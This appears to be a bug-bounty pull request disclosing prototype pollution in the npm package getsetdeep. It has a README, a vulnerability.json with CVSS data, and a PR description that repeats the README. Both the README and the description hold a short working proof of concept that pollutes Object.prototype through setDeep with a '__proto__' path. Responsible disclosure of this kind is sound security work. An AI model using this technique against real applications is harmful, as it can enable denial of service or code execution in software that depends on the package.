### PR TITLE
Prototype Pollution in getsetdeep

### DIFF
--- a/bounties/npm/getsetdeep/1/README.md
+++ b/bounties/npm/getsetdeep/1/README.md
@@ -1,0 +1,30 @@
+# Description
+
+`getsetdeep` is vulnerable to `Prototype Pollution`.
+
+# Proof of Concept
+
+1. Create the following PoC file:
+```javascript
+// poc.js
+const { setDeep } = require('getsetdeep')
+
+console.log(`Before: ${{}.polluted}`)
+setDeep({}, '__proto__.polluted', true)
+console.log(`After: ${{}.polluted}`)
+```
+2. Execute the following commands in the terminal:
+```bash
+npm i getsetdeep # install vulnerable package
+node poc.js # run the PoC
+```
+3. Check the output:
+```
+Before: undefined
+After: true
+```
+
+# Impact
+
+`Prototype Pollution` leads to Information Disclosure/DoS/RCE.
+

--- a/bounties/npm/getsetdeep/1/vulnerability.json
+++ b/bounties/npm/getsetdeep/1/vulnerability.json
@@ -1,0 +1,57 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2021-01-17",
+    "AffectedVersionRange": "*",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+        "Discloser": "arjunshibu",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "getsetdeep",
+        "URL": "https://www.npmjs.com/package/getsetdeep",
+        "Downloads": "4180"
+    },
+    "CWEs": [
+        {
+            "ID": "471",
+            "Description": "Modification of Assumed-Immutable Data (MAID)"
+        }
+    ],
+    "CVSS": {
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "L",
+        "I": "L",
+        "A": "L",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "5.6"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/bevry/getsetdeep",
+        "Codebase": [
+            "TypeScript"
+        ],
+        "Owner": "bevry",
+        "Name": "getsetdeep"
+    },
+    "Permalinks": [
+        ""
+    ],
+    "References": [
+        {
+            "Description": "",
+            "URL": ""
+        }
+    ]
+}


### PR DESCRIPTION
# Description

`getsetdeep` is vulnerable to `Prototype Pollution`.

# Proof of Concept

1. Create the following PoC file:
```javascript
// poc.js
const { setDeep } = require('getsetdeep')

console.log(`Before: ${{}.polluted}`)
setDeep({}, '__proto__.polluted', true)
console.log(`After: ${{}.polluted}`)
```
2. Execute the following commands in the terminal:
```bash
npm i getsetdeep # install vulnerable package
node poc.js # run the PoC
```
3. Check the output:
```
Before: undefined
After: true
```

# Impact

`Prototype Pollution` leads to Information Disclosure/DoS/RCE.

## :white_check_mark: Checklist

* [x]  _Created and populated the `README.md` and `vulnerability.json` files_

* [x]  _Provided the repository URL and any applicable permalinks_

* [x]  _Defined all the applicable weaknesses (CWEs)_

* [x]  _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_

* [x]  _Checked that the vulnerability affects the latest version of the package released_

* [x]  _Checked that a fix does not currently exist that remediates this vulnerability_

* [x]  _Complied with all applicable laws_